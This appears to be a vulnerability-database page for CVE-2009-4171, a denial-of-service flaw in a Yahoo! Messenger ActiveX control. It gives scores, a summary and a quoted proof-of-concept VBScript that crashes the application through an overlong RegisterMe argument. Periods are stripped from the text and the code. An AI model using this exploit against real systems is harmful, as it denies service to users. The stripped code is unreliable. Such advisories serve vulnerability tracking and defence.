4.3
CVSSv2

CVE-2009-4171

Published: 02/12/2009 Updated: 10/10/2018
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 440
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P

Vulnerability Summary

An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote malicious users to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument.

Vulnerable Product Search on Vulmon Subscribe to Product

yahoo messenger 9.0.0.2162

Exploits

source: wwwsecurityfocuscom/bid/37007/info Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users Given the nature ...
<?XML version='10' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' /> <script language='vbscript'> arg1=String(11284, "A") targetRegisterMe arg1 </script> </job> </package> ...